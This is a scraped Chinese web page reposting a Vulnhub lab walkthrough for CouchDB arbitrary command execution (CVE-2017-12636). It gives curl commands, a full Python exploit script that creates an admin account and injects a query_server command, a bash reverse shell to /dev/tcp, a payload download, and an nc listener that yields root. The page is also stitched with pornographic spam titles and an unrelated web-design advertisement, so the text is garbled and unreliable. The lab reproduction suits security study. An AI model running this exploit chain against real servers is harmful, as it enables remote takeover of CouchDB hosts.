老熟女激烈的高潮_日韩一级黄色录像_亚洲1区2区3区视频_精品少妇一区二区三区在线播放_国产欧美日产久久_午夜福利精品导航凹凸

利用Vulnhub復現漏洞-Couchdb任意命令執行

漏洞原理:
Apache CouchDB是一個開源數據庫,專注于易用性和成為"完全擁抱web的數據庫"。它是一個使用JSON作為存儲格式,JavaScript作為查詢語言,MapReduce和HTTP作為API的NoSql數據庫。應用廣泛,如BBC用在其動態內容展示平臺,Credit Suisse用在其內部的商品部門的市場框架,Meebo,用在其社交平臺(web和應用程序)。

在永定等地區,都構建了全面的區域性戰略布局,加強發展的系統性、市場前瞻性、產品創新能力,以專注、極致的服務理念,為客戶提供成都做網站、網站設計 網站設計制作按需定制,公司網站建設,企業網站建設,高端網站設計,成都全網營銷,外貿營銷網站建設,永定網站建設費用合理。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一個任意命令執行漏洞,我們可以通過config api修改couchdb的配置query_server,這個配置項在設計、執行view的時候將被運行。

漏洞復現:
1、新增query_server配置,寫入要執行的命令;
curl -X PUT 'http://pppp:pppp@靶機ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
紅箭頭的是自己創建的賬號和密碼,下面顯示我的已經有了。
利用Vulnhub復現漏洞 - Couchdb 任意命令執行
2、新建一個臨時庫和臨時表,插入一條記錄;
①curl -X PUT 'http://pppp:pppp@靶機ip:5984/oll'
②curl -X PUT 'http://pppp:pppp@靶機ip:5984/oll/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
紅箭頭指的是自己創建的表
利用Vulnhub復現漏洞 - Couchdb 任意命令執行
3.調用query_server處理數據
curl -X PUT http://pppp:pppp@靶機ip:5984/oll/_design/vul -d '{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"

執行EXP反彈Shell:
1.反彈腳本:在home下面創建個index.html。添以下內容
bash -i >& /dev/tcp/172.16.11.2/9000 0>&1
紅箭頭指的是本機ip
利用Vulnhub復現漏洞 - Couchdb 任意命令執行
2.另起一個終端,在home下執行 python -m SimpleHTTPServer 8000
利用Vulnhub復現漏洞 - Couchdb 任意命令執行
3.創建一個exp.py的腳本,如下:
#!/usr/bin/env python3
import requests
from requests.auth import HTTPBasicAuth

target = 'http://192.168.8.148:5984'
command = '"bash -i >& /dev/tcp/192.168.8.148/4444 0>&1"'
version = 2

session = requests.session()
session.headers = {
'Content-Type': 'application/json'
}
#session.proxies = {
#'http': 'http://127.0.0.1:8085'
#}
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
"type": "user",
"name": "wooyun",
"roles": ["_admin"],
"roles": [],
"password": "wooyun"
}''')

session.auth = HTTPBasicAuth('wooyun', 'wooyun')

if version == 1:
session.put(target + ('/_config/query_servers/cmd'), data=command)
else:
host = session.get(target + '/_membership').json()['all_nodes'][0]
session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=command)

session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

if version == 1:
session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

利用Vulnhub復現漏洞 - Couchdb 任意命令執行

4.修改exp.py中command的值為:curl 172.16.11.2:8000 -o /tmp/bashell 保存并執行命令 python exp.py。
這個時候可以看見HTTP服務成功監聽到下載請求

5.再重新打開一個終端,并監聽著 nc -lnvp 9000 ,監聽本地9000端口
利用Vulnhub復現漏洞 - Couchdb 任意命令執行

6.修改 exp.py 中的 command 的值為 bash /tmp/bashell ,保存并執行命令 python exp.py ,成功獲取反彈回來的Shell
利用Vulnhub復現漏洞 - Couchdb 任意命令執行
target的ip為靶機ip(一定要寫對,別學本人ip寫錯,發愁一天)

7.這樣就成功了。
利用Vulnhub復現漏洞 - Couchdb 任意命令執行
獲得root。


標題名稱:利用Vulnhub復現漏洞-Couchdb任意命令執行
轉載來源:http://www.xueling.net.cn/article/peghhg.html

其他資訊

在線咨詢
服務熱線
服務熱線:028-86922220
TOP
主站蜘蛛池模板: 久久最新精品视频 | 污网站在线看 | 稀缺小u女呦精品呦免费 | 91视频-全网资源最全平台 | 欧美激情在线精品一区二区三区 | 久久青青操 | 大地资源网高清在线播放 | 玩弄丰满奶水的女邻居 | 久久久久久a| 国新精品乱码一区二区三区18 | 亚洲VA中文字幕不卡无码 | 亚洲情在线 | 给丰满丁字裤少妇按摩到高潮 | 2024你懂的网站无码内射 | 伊人网视频在线观看 | 一区二区三区在线观看国产 | 亚洲精品中文字 | 红杏亚洲影院一区二区三区 | 亚洲熟妇中文字幕五十中出 | 国产第一页第二页 | 91免费版在线看 | 天天综合天天爱天天做天天爽 | 色成人在线 | 最新69成人国产精品视频免费 | 日韩精品久久久肉伦网站 | 久久综合在线观看 | 国产又黄又猛又粗又爽的A片小说 | 啊轻点灬大ji巴太粗太长了日本 | 亚洲欧美日韩精品一区二区 | 无码人妻久久一区二区三区免费 | 性高湖久久久久久久久aaaaa | 蜜臀av一区二区三区 | 日韩免费中文字幕 | 在线观看sm重口一区二区 | 午夜影院免费版 | 日本一区二区三区www | 一区二区美女视频 | 99精品国产高清一区二区麻豆 | 国产自啪精品视频网站丝袜 | 欧美V日韩V亚洲V最新在线观看 | 亚色成人|